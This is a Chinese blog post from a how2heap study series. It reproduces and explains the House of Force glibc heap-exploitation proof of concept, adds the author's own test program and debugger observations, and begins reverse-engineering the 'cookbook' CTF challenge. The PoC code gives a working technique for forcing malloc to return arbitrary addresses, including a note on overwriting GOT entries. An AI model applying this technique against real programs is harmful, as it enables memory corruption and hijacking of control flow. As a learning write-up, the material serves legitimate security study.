<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 4.2.0">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">


<link rel="stylesheet" href="/lib/font-awesome/css/font-awesome.min.css">

<script id="hexo-configurations">
    var NexT = window.NexT || {};
    var CONFIG = {"hostname":"yoursite.com","root":"/","scheme":"Gemini","version":"7.7.2","exturl":false,"sidebar":{"position":"left","display":"post","padding":18,"offset":12,"onmobile":false},"copycode":{"enable":false,"show_result":false,"style":null},"back2top":{"enable":true,"sidebar":false,"scrollpercent":false},"bookmark":{"enable":false,"color":"#222","save":"auto"},"fancybox":false,"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"algolia":{"hits":{"per_page":10},"labels":{"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}},"localsearch":{"enable":true,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false},"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},"path":"search.xml"};
  </script>

  <meta name="description" content="how2heap - house_of_force&amp;cookbook、bcloudubuntu16.04 libc2.23 house_of_force.c1234567891011121314151617181920212223242526272829303132333435363738394041424344454647484950515253545556575859606162636">
<meta property="og:type" content="article">
<meta property="og:title" content="how2heap - house_of_force&amp;cookbook、bcloud">
<meta property="og:url" content="http://yoursite.com/2020/02/22/how2heap-house-of-force-cookbook%E3%80%81bcloud/index.html">
<meta property="og:site_name" content="Coldshiel&#39;s blog">
<meta property="og:description" content="how2heap - house_of_force&amp;cookbook、bcloudubuntu16.04 libc2.23 house_of_force.c1234567891011121314151617181920212223242526272829303132333435363738394041424344454647484950515253545556575859606162636">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="http://yoursite.com/2020/02/22/how2heap-house-of-force-cookbook%E3%80%81bcloud/1582041965701.png">
<meta property="og:image" content="http://yoursite.com/2020/02/22/how2heap-house-of-force-cookbook%E3%80%81bcloud/1582042913527.png">
<meta property="og:image" content="http://yoursite.com/2020/02/22/how2heap-house-of-force-cookbook%E3%80%81bcloud/1582043050649.png">
<meta property="og:image" content="http://yoursite.com/2020/02/22/how2heap-house-of-force-cookbook%E3%80%81bcloud/1582043111462.png">
<meta property="og:image" content="http://yoursite.com/2020/02/22/how2heap-house-of-force-cookbook%E3%80%81bcloud/1582080713143.png">
<meta property="og:image" content="http://yoursite.com/2020/02/22/how2heap-house-of-force-cookbook%E3%80%81bcloud/1582082667248.png">
<meta property="og:image" content="http://yoursite.com/2020/02/22/how2heap-house-of-force-cookbook%E3%80%81bcloud/1582247560625.png">
<meta property="og:image" content="http://yoursite.com/2020/02/22/how2heap-house-of-force-cookbook%E3%80%81bcloud/1582247755837.png">
<meta property="og:image" content="http://yoursite.com/2020/02/22/how2heap-house-of-force-cookbook%E3%80%81bcloud/1582248382621.png">
<meta property="og:image" content="http://yoursite.com/2020/02/22/how2heap-house-of-force-cookbook%E3%80%81bcloud/1582248526810.png">
<meta property="og:image" content="http://yoursite.com/2020/02/22/how2heap-house-of-force-cookbook%E3%80%81bcloud/1582248585103.png">
<meta property="og:image" content="http://yoursite.com/2020/02/22/how2heap-house-of-force-cookbook%E3%80%81bcloud/1582249392325.png">
<meta property="og:image" content="http://yoursite.com/2020/02/22/how2heap-house-of-force-cookbook%E3%80%81bcloud/1582213398090.png">
<meta property="og:image" content="http://yoursite.com/2020/02/22/how2heap-house-of-force-cookbook%E3%80%81bcloud/1582252497984.png">
<meta property="og:image" content="http://yoursite.com/2020/02/22/how2heap-house-of-force-cookbook%E3%80%81bcloud/1582412657048.png">
<meta property="og:image" content="http://yoursite.com/2020/02/22/how2heap-house-of-force-cookbook%E3%80%81bcloud/1582413141212.png">
<meta property="og:image" content="http://yoursite.com/2020/02/22/how2heap-house-of-force-cookbook%E3%80%81bcloud/1582413440952.png">
<meta property="og:image" content="http://yoursite.com/2020/02/22/how2heap-house-of-force-cookbook%E3%80%81bcloud/1582413618572.png">
<meta property="og:image" content="http://yoursite.com/2020/02/22/how2heap-house-of-force-cookbook%E3%80%81bcloud/1582413728779.png">
<meta property="article:published_time" content="2020-02-23T02:42:29.000Z">
<meta property="article:modified_time" content="2020-02-29T10:07:43.750Z">
<meta property="article:author" content="Coldshield">
<meta property="article:tag" content="how2heap">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="http://yoursite.com/2020/02/22/how2heap-house-of-force-cookbook%E3%80%81bcloud/1582041965701.png">

<link rel="canonical" href="http://yoursite.com/2020/02/22/how2heap-house-of-force-cookbook%E3%80%81bcloud/">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome : false,
    isPost : true
  };
</script>

  <title>how2heap - house_of_force&cookbook、bcloud | Coldshiel's blog</title>
  






  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

</head>

<body itemscope itemtype="http://schema.org/WebPage">
  <div class="container use-motion">
    <div class="headband"></div>

    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="Toggle navigation bar">
      <span class="toggle-line toggle-line-first"></span>
      <span class="toggle-line toggle-line-middle"></span>
      <span class="toggle-line toggle-line-last"></span>
    </div>
  </div>

  <div class="site-meta">

    <div>
      <a href="/" class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">Coldshiel's blog</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
        <i class="fa fa-search fa-fw fa-lg"></i>
    </div>
  </div>
</div>


<nav class="site-nav">
  
  <ul id="menu" class="menu">
        <li class="menu-item menu-item-home">

    <a href="/" rel="section"><i class="fa fa-fw fa-home"></i>Home</a>

  </li>
        <li class="menu-item menu-item-about">

    <a href="/about/" rel="section"><i class="fa fa-fw fa-user"></i>About</a>

  </li>
        <li class="menu-item menu-item-tags">

    <a href="/tags/" rel="section"><i class="fa fa-fw fa-tags"></i>Tags</a>

  </li>
        <li class="menu-item menu-item-archives">

    <a href="/archives/" rel="section"><i class="fa fa-fw fa-archive"></i>Archives</a>

  </li>
      <li class="menu-item menu-item-search">
        <a role="button" class="popup-trigger"><i class="fa fa-search fa-fw"></i>Search
        </a>
      </li>
  </ul>

</nav>
  <div class="site-search">
    <div class="popup search-popup">
    <div class="search-header">
  <span class="search-icon">
    <i class="fa fa-search"></i>
  </span>
  <div class="search-input-container">
    <input autocomplete="off" autocorrect="off" autocapitalize="off"
           placeholder="Searching..." spellcheck="false"
           type="search" class="search-input">
  </div>
  <span class="popup-btn-close">
    <i class="fa fa-times-circle"></i>
  </span>
</div>
<div id="search-result"></div>

</div>
<div class="search-pop-overlay"></div>

  </div>
</div>
    </header>

    
  <div class="back-to-top">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>


    <main class="main">
      <div class="main-inner">
        <div class="content-wrap">
          

          <div class="content">
            

  <div class="posts-expand">
      
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block " lang="en">
    <link itemprop="mainEntityOfPage" href="http://yoursite.com/2020/02/22/how2heap-house-of-force-cookbook%E3%80%81bcloud/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/avatar.gif">
      <meta itemprop="name" content="Coldshield">
      <meta itemprop="description" content="">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Coldshiel's blog">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          how2heap - house_of_force&cookbook、bcloud
        </h1>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              <span class="post-meta-item-text">Posted on</span>

              <time title="Created: 2020-02-22 18:42:29" itemprop="dateCreated datePublished" datetime="2020-02-22T18:42:29-08:00">2020-02-22</time>
            </span>
              <span class="post-meta-item">
                <span class="post-meta-item-icon">
                  <i class="fa fa-calendar-check-o"></i>
                </span>
                <span class="post-meta-item-text">Edited on</span>
                <time title="Modified: 2020-02-29 02:07:43" itemprop="dateModified" datetime="2020-02-29T02:07:43-08:00">2020-02-29</time>
              </span>

          

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        <h1 id="how2heap-house-of-force-amp-cookbook、bcloud"><a href="#how2heap-house-of-force-amp-cookbook、bcloud" class="headerlink" title="how2heap - house_of_force&amp;cookbook、bcloud"></a>how2heap - house_of_force&amp;cookbook、bcloud</h1><p>ubuntu16.04 libc2.23</p>
<h1 id="house-of-force-c"><a href="#house-of-force-c" class="headerlink" title="house_of_force.c"></a>house_of_force.c</h1><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br></pre></td><td class="code"><pre><span class="line">&#x2F;*</span><br><span class="line">   This PoC works also with ASLR enabled.</span><br><span class="line">   It will overwrite a GOT entry so in order to apply exactly this technique RELRO must be disabled.</span><br><span class="line">   If RELRO is enabled you can always try to return a chunk on the stack as proposed in Malloc Des Maleficarum </span><br><span class="line">   ( http:&#x2F;&#x2F;phrack.org&#x2F;issues&#x2F;66&#x2F;10.html )</span><br><span class="line">   Tested in Ubuntu 14.04, 64bit.</span><br><span class="line">*&#x2F;</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">#include &lt;stdio.h&gt;</span><br><span class="line">#include &lt;stdint.h&gt;</span><br><span class="line">#include &lt;stdlib.h&gt;</span><br><span class="line">#include &lt;string.h&gt;</span><br><span class="line">#include &lt;stdint.h&gt;</span><br><span class="line">#include &lt;malloc.h&gt;</span><br><span class="line"></span><br><span class="line">char bss_var[] &#x3D; &quot;This is a string that we want to overwrite.&quot;;</span><br><span class="line"></span><br><span class="line">int main(int argc , char* argv[])</span><br><span class="line">&#123;</span><br><span class="line">	fprintf(stderr, &quot;\nWelcome to the House of Force\n\n&quot;);</span><br><span class="line">	fprintf(stderr, &quot;The idea of House of Force is to overwrite the top chunk and let the malloc return an arbitrary value.\n&quot;);</span><br><span class="line">	fprintf(stderr, &quot;The top chunk is a special chunk. Is the last in memory &quot;</span><br><span class="line">		&quot;and is the chunk that will be resized when malloc asks for more space from the os.\n&quot;);</span><br><span class="line"></span><br><span class="line">	fprintf(stderr, &quot;\nIn the end, we will use this to overwrite a variable at %p.\n&quot;, bss_var);</span><br><span class="line">	fprintf(stderr, &quot;Its current value is: %s\n&quot;, bss_var);</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"></span><br><span class="line">	fprintf(stderr, &quot;\nLet&#39;s allocate the first chunk, taking space from the wilderness.\n&quot;);</span><br><span class="line">	intptr_t *p1 &#x3D; malloc(256);&#x2F;&#x2F;0x100</span><br><span class="line">	fprintf(stderr, &quot;The chunk of 256 bytes has been allocated at %p.\n&quot;, p1 - 2);</span><br><span class="line"></span><br><span class="line">	fprintf(stderr, &quot;\nNow the heap is composed of two chunks: the one we allocated and the top chunk&#x2F;wilderness.\n&quot;);</span><br><span class="line">	int real_size &#x3D; malloc_usable_size(p1);</span><br><span class="line">	fprintf(stderr, &quot;Real size (aligned and all that jazz) of our allocated chunk is %ld.\n&quot;, real_size + sizeof(long)*2);</span><br><span class="line"></span><br><span class="line">	fprintf(stderr, &quot;\nNow let&#39;s emulate a vulnerability that can overwrite the header of the Top Chunk\n&quot;);</span><br><span class="line"></span><br><span class="line">	&#x2F;&#x2F;----- VULNERABILITY ----</span><br><span class="line">	intptr_t *ptr_top &#x3D; (intptr_t *) ((char *)p1 + real_size - sizeof(long));</span><br><span class="line">	fprintf(stderr, &quot;\nThe top chunk starts at %p\n&quot;, ptr_top);</span><br><span class="line"></span><br><span class="line">	fprintf(stderr, &quot;\nOverwriting the top chunk size with a big value so we can ensure that the malloc will never call mmap.\n&quot;);</span><br><span class="line">	fprintf(stderr, &quot;Old size of top chunk %#llx\n&quot;, *((unsigned long long int *)((char *)ptr_top + sizeof(long))));</span><br><span class="line">	*(intptr_t *)((char *)ptr_top + sizeof(long)) &#x3D; -1;</span><br><span class="line">	fprintf(stderr, &quot;New size of top chunk %#llx\n&quot;, *((unsigned long long int *)((char *)ptr_top + sizeof(long))));</span><br><span class="line">	&#x2F;&#x2F;------------------------</span><br><span class="line"></span><br><span class="line">	fprintf(stderr, &quot;\nThe size of the wilderness is now gigantic. We can allocate anything without malloc() calling mmap.\n&quot;</span><br><span class="line">	   &quot;Next, we will allocate a chunk that will get us right up against the desired region (with an integer\n&quot;</span><br><span class="line">	   &quot;overflow) and will then be able to allocate a chunk right over the desired region.\n&quot;);</span><br><span class="line"></span><br><span class="line">	&#x2F;*</span><br><span class="line">	 * The evil_size is calulcated as (nb is the number of bytes requested + space for metadata):</span><br><span class="line">	 * new_top &#x3D; old_top + nb</span><br><span class="line">	 * nb &#x3D; new_top - old_top</span><br><span class="line">	 * req + 2sizeof(long) &#x3D; new_top - old_top</span><br><span class="line">	 * req &#x3D; new_top - old_top - 2sizeof(long)</span><br><span class="line">	 * req &#x3D; dest - 2sizeof(long) - old_top - 2sizeof(long)</span><br><span class="line">	 * req &#x3D; dest - old_top - 4*sizeof(long)</span><br><span class="line">	 *&#x2F;</span><br><span class="line">	unsigned long evil_size &#x3D; (unsigned long)bss_var - sizeof(long)*4 - (unsigned long)ptr_top;</span><br><span class="line">	fprintf(stderr, &quot;\nThe value we want to write to at %p, and the top chunk is at %p, so accounting for the header size,\n&quot;</span><br><span class="line">	   &quot;we will malloc %#lx bytes.\n&quot;, bss_var, ptr_top, evil_size);</span><br><span class="line">	void *new_ptr &#x3D; malloc(evil_size);</span><br><span class="line">	fprintf(stderr, &quot;As expected, the new pointer is at the same place as the old top chunk: %p\n&quot;, new_ptr - sizeof(long)*2);</span><br><span class="line"></span><br><span class="line">	void* ctr_chunk &#x3D; malloc(100);</span><br><span class="line">	fprintf(stderr, &quot;\nNow, the next chunk we overwrite will point at our target buffer.\n&quot;);</span><br><span class="line">	fprintf(stderr, &quot;malloc(100) &#x3D;&gt; %p!\n&quot;, ctr_chunk);</span><br><span class="line">	fprintf(stderr, &quot;Now, we can finally overwrite that value:\n&quot;);</span><br><span class="line"></span><br><span class="line">	fprintf(stderr, &quot;... old string: %s\n&quot;, bss_var);</span><br><span class="line">	fprintf(stderr, &quot;... doing strcpy overwrite with \&quot;YEAH!!!\&quot;...\n&quot;);</span><br><span class="line">	strcpy(ctr_chunk, &quot;YEAH!!!&quot;);</span><br><span class="line">	fprintf(stderr, &quot;... new string: %s\n&quot;, bss_var);</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">	&#x2F;&#x2F; some further discussion:</span><br><span class="line">	&#x2F;&#x2F;fprintf(stderr, &quot;This controlled malloc will be called with a size parameter of evil_size &#x3D; malloc_got_address - 8 - p2_guessed\n\n&quot;);</span><br><span class="line">	&#x2F;&#x2F;fprintf(stderr, &quot;This because the main_arena-&gt;top pointer is setted to current av-&gt;top + malloc_size &quot;</span><br><span class="line">	&#x2F;&#x2F;	&quot;and we \nwant to set this result to the address of malloc_got_address-8\n\n&quot;);</span><br><span class="line">	&#x2F;&#x2F;fprintf(stderr, &quot;In order to do this we have malloc_got_address-8 &#x3D; p2_guessed + evil_size\n\n&quot;);</span><br><span class="line">	&#x2F;&#x2F;fprintf(stderr, &quot;The av-&gt;top after this big malloc will be setted in this way to malloc_got_address-8\n\n&quot;);</span><br><span class="line">	&#x2F;&#x2F;fprintf(stderr, &quot;After that a new call to malloc will return av-&gt;top+8 ( +8 bytes for the header ),&quot;</span><br><span class="line">	&#x2F;&#x2F;	&quot;\nand basically return a chunk at (malloc_got_address-8)+8 &#x3D; malloc_got_address\n\n&quot;);</span><br><span class="line"></span><br><span class="line">	&#x2F;&#x2F;fprintf(stderr, &quot;The large chunk with evil_size has been allocated here 0x%08x\n&quot;,p2);</span><br><span class="line">	&#x2F;&#x2F;fprintf(stderr, &quot;The main_arena value av-&gt;top has been setted to malloc_got_address-8&#x3D;0x%08x\n&quot;,malloc_got_address);</span><br><span class="line"></span><br><span class="line">	&#x2F;&#x2F;fprintf(stderr, &quot;This last malloc will be served from the remainder code and will return the av-&gt;top+8 injected before\n&quot;);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>这里面最重要的应该就是这个计算过程了，我把步骤解释写一下：</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="meta-keyword">define</span> chunk_at_offset(p, s)  ((mchunkptr) (((char *) (p)) + (s)))</span></span><br><span class="line">new_top = old_top + nb</span><br><span class="line"><span class="comment">//remainder = ↑chunk_at_offset (victim, nb);源码中这里remainder对应的就是new_top，victim此时就是old_top</span></span><br><span class="line"></span><br><span class="line">nb = new_top - old_top</span><br><span class="line">req + <span class="number">2</span><span class="keyword">sizeof</span>(<span class="keyword">long</span>) = new_top - old_top<span class="comment">//这里分解nb</span></span><br><span class="line">req = new_top - old_top - <span class="number">2</span><span class="keyword">sizeof</span>(<span class="keyword">long</span>)</span><br><span class="line">req = dest - <span class="number">2</span><span class="keyword">sizeof</span>(<span class="keyword">long</span>) - old_top - <span class="number">2</span><span class="keyword">sizeof</span>(<span class="keyword">long</span>)<span class="comment">//dest = new_top + 2sizeof(long)</span></span><br><span class="line">req = dest - old_top - <span class="number">4</span>*<span class="keyword">sizeof</span>(<span class="keyword">long</span>)</span><br></pre></td></tr></table></figure>

<p>其中最主要的是通过<code>chunk_at_offset(p, s)</code>这个Macro来获得victim的时候，nb为负数时会把topchunk的位置往回放</p>
<p>但是<code>_int_malloc</code>最开始对我们申请的bytes做的检查是这样的：</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="meta-keyword">define</span> REQUEST_OUT_OF_RANGE(req)                                 \</span></span><br><span class="line">  ((<span class="keyword">unsigned</span> <span class="keyword">long</span>) (req) &gt;=						      \</span><br><span class="line">   (<span class="keyword">unsigned</span> <span class="keyword">long</span>) (INTERNAL_SIZE_T) (<span class="number">-2</span> * MINSIZE))</span><br><span class="line"><span class="comment">//MINSIZE:x64 0x20,x86 0x10 </span></span><br><span class="line"><span class="comment">//-2*MINSIZE=0xFFFF FFFF FFFF FFC0(x64),0xFFFF FFE0(x86)</span></span><br><span class="line"><span class="comment">//req会被转换成unsigned long，只要我们通过上面的这个检查就可以过第一步了</span></span><br><span class="line"><span class="comment">/* pad request bytes into a usable size -- internal version */</span></span><br><span class="line"></span><br><span class="line"><span class="meta">#<span class="meta-keyword">define</span> request2size(req)                                         \</span></span><br><span class="line">  (((req) + SIZE_SZ + MALLOC_ALIGN_MASK &lt; MINSIZE)  ?             \</span><br><span class="line">   MINSIZE :                                                      \</span><br><span class="line">   ((req) + SIZE_SZ + MALLOC_ALIGN_MASK) &amp; ~MALLOC_ALIGN_MASK)</span><br><span class="line"></span><br><span class="line"><span class="comment">/*  Same, except also perform argument check */</span></span><br><span class="line"></span><br><span class="line"><span class="meta">#<span class="meta-keyword">define</span> checked_request2size(req, sz)                             \</span></span><br><span class="line">  <span class="keyword">if</span> (REQUEST_OUT_OF_RANGE (req)) &#123;					      \</span><br><span class="line">      __set_errno (ENOMEM);						      \</span><br><span class="line">      <span class="keyword">return</span> <span class="number">0</span>;								      \</span><br><span class="line">    &#125;									      \</span><br><span class="line">  (sz) = request2size (req);</span><br></pre></td></tr></table></figure>

<p>然后用一个负数的nb去topchunk申请chunk，当然其中经过smallbin range检查的时候还调用了<code>malloc_consolidate</code></p>
<p>用topchunk的size和nb作比对的时候都是转换成了unsigned long：此时<code>-1</code>计算出来的size是最大的，可以通过该检查：<code>(unsigned long) (size) &gt;= (unsigned long) (nb + MINSIZE)</code></p>
<h2 id="Debug"><a href="#Debug" class="headerlink" title="Debug"></a>Debug</h2><p>先不急着debug示例程序，我自己准备用自己的程序试一试，具体如下</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;stdio.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;stdlib.h&gt;</span></span></span><br><span class="line"><span class="function"><span class="keyword">int</span> <span class="title">main</span><span class="params">(<span class="keyword">int</span> argc , <span class="keyword">char</span>* argv[])</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">	<span class="keyword">char</span> *fast=<span class="built_in">malloc</span>(<span class="number">0x20</span>);</span><br><span class="line">	<span class="keyword">char</span> *p=<span class="built_in">malloc</span>(<span class="number">0xff0</span>);</span><br><span class="line">	<span class="built_in">free</span>(fast);<span class="comment">//use for test</span></span><br><span class="line">	*(<span class="keyword">int64_t</span> *)(p+<span class="number">0xff8</span>)=(<span class="keyword">long</span> <span class="keyword">long</span>)<span class="number">-1</span>;<span class="comment">//set top_chunk size</span></span><br><span class="line">	</span><br><span class="line">	<span class="keyword">char</span> *p2=<span class="built_in">malloc</span>(<span class="number">0xFFFFFFFFFFFFF000</span><span class="number">-2</span>*<span class="keyword">sizeof</span>(<span class="keyword">size_t</span>));<span class="comment">//set new_top </span></span><br><span class="line">	<span class="keyword">char</span> *p3=<span class="built_in">malloc</span>(<span class="number">0x100</span>);<span class="comment">//the same address as p</span></span><br><span class="line">	<span class="built_in">printf</span>(<span class="string">"%p,%p"</span>,p,p3);</span><br><span class="line">	<span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>这里我写了一个简单的程序，其中0x30的chunk是用来debug的时候看是否调用了<code>malloc_consolidate</code></p>
<p>设置top_chunk size之后：</p>
<img src="/2020/02/22/how2heap-house-of-force-cookbook%E3%80%81bcloud/1582041965701.png" width="90%" height="90%">

<p>可以看到pwndbg的脚本报错了，不过我们直接看地址偏移还是一样的</p>
<p>然后<code>char *p2=malloc(0xFFFFFFFFFFFFF000-2*sizeof(size_t));</code>这一行的意思是传入一个<code>-0x1000-2*size_t</code>的值，计算nb时会补成<code>-0x1000</code>，通过两道检查后在源码中这里:<code>remainder = chunk_at_offset (victim, nb)</code>，remainder是用来设置新的top_chunk的，所以我们直接就把top_chunk往回放到我们之前申请的0x1000的chunk处去了。</p>
<p>因为chunksize计算时会除去低三位，所以<code>remainder_size = size - nb;</code>这一步中的size实际上是<code>0xfffffffffffffff8</code><br>，减去nb(-0x1000)之后就变成了<code>0xff8</code>，如果我们想要之后的top_chunk能再大一些显然做不到了，因为要通过<code>(unsigned long) (size) &gt;= (unsigned long) (nb + MINSIZE)</code>这个检查</p>
<p>再就是设置top_chunk size的时候，虽然说计算size时低三位是没用的，但是最后一位必须为1，要不然在<code>_libc_malloc</code>里面的<code>arena_get</code>好像会出问题（待深入）</p>
<p>以上内容执行时如下：</p>
<img src="/2020/02/22/how2heap-house-of-force-cookbook%E3%80%81bcloud/1582042913527.png" width="90%" height="90%">

<p>可以看到新的top_chunk已经被设置成了我们之前0x1000 chunk的地址</p>
<img src="/2020/02/22/how2heap-house-of-force-cookbook%E3%80%81bcloud/1582043050649.png" width="90%" height="90%">

<p>最后的运行效果就是这样：</p>
<p><img src="/2020/02/22/how2heap-house-of-force-cookbook%E3%80%81bcloud/1582043111462.png" alt="1582043111462"></p>
<p>两个指针指向的chunk是一样的，也验证了<code>req = dest - old_top - 4*sizeof(long)</code></p>
<hr>
<p>然后再来debug示例代码（这里很简略）</p>
<p>所以上面示例代码中把topchunk的size改成了-1，然后计算出的<code>evil_size=0xffffffffffafcf30</code>当然也通过了检查</p>
<img src="/2020/02/22/how2heap-house-of-force-cookbook%E3%80%81bcloud/1582080713143.png" width="80%" height="80%">

<p>可以看到这里算出来的remainder就是0x602050了，刚好是我们<code>字符串地址-0x10</code>的位置，所以再malloc的时候就可以malloc出这块内存，至于后面注释的那一部分，大致意思就差不多是我们可以通过这个方法来修改GOT表，暂时就不debug了</p>
<p>当然这上面是因为没有开ASLR，bss和top_chunk比较近,如果开启PIE加上ASLR的效果也是一样的：</p>
<img src="/2020/02/22/how2heap-house-of-force-cookbook%E3%80%81bcloud/1582082667248.png" width="80%" height="80%">

<p>一样申请到了这块内存</p>
<p>接下来肝题吧</p>
<h1 id="cookbook"><a href="#cookbook" class="headerlink" title="cookbook"></a>cookbook</h1><h2 id="程序分析"><a href="#程序分析" class="headerlink" title="程序分析"></a>程序分析</h2><p>emmm…怎么说呢，感觉以后分析这种程序得换换思路了，以前都是拿着题就往IDA拖了分析，现在看来程序复杂度够高的时候直接这样分析好像不太行，工作量太大，而且根本没有思路，对于量大一点的题得先跑熟悉有个印象再去写，熟悉逻辑之后再去逆会快很多</p>
<p>下面就写一些大致的，后面会放一个总结的图，说不定以后程序分析就都是总结的图了，因为程序每个细节都扣到会浪费时间，能找到漏洞然后利用才是王道啊</p>
<h3 id="main"><a href="#main" class="headerlink" title="main"></a>main</h3><p><img src="/2020/02/22/how2heap-house-of-force-cookbook%E3%80%81bcloud/1582247560625.png" alt="1582247560625"></p>
<p>main大致对应的就是这些东西，Rec代表recipe，Ing代表Ingredient，<code>main_menu</code>是我们操作主菜单，之前做的都是初始化操作</p>
<h3 id="init-RecAndIng"><a href="#init-RecAndIng" class="headerlink" title="init_RecAndIng"></a>init_RecAndIng</h3><p>这个函数分为两个子函数，第一个差不多是下面这样子的，主要做初始化Ingredient的操作</p>
<p><code>add_ingredient</code>是<code>calloc(0x90)</code>一个ingredient的结构体，等下放一张图给自己看吧</p>
<p><code>Ingredient_ListHeader</code>是存在.bss段上的一个链表头指针。<code>LinkList_add</code>就是往这个头指针添加结点，<code>calloc(0x8)</code>，然后存一个next指针一个数据</p>
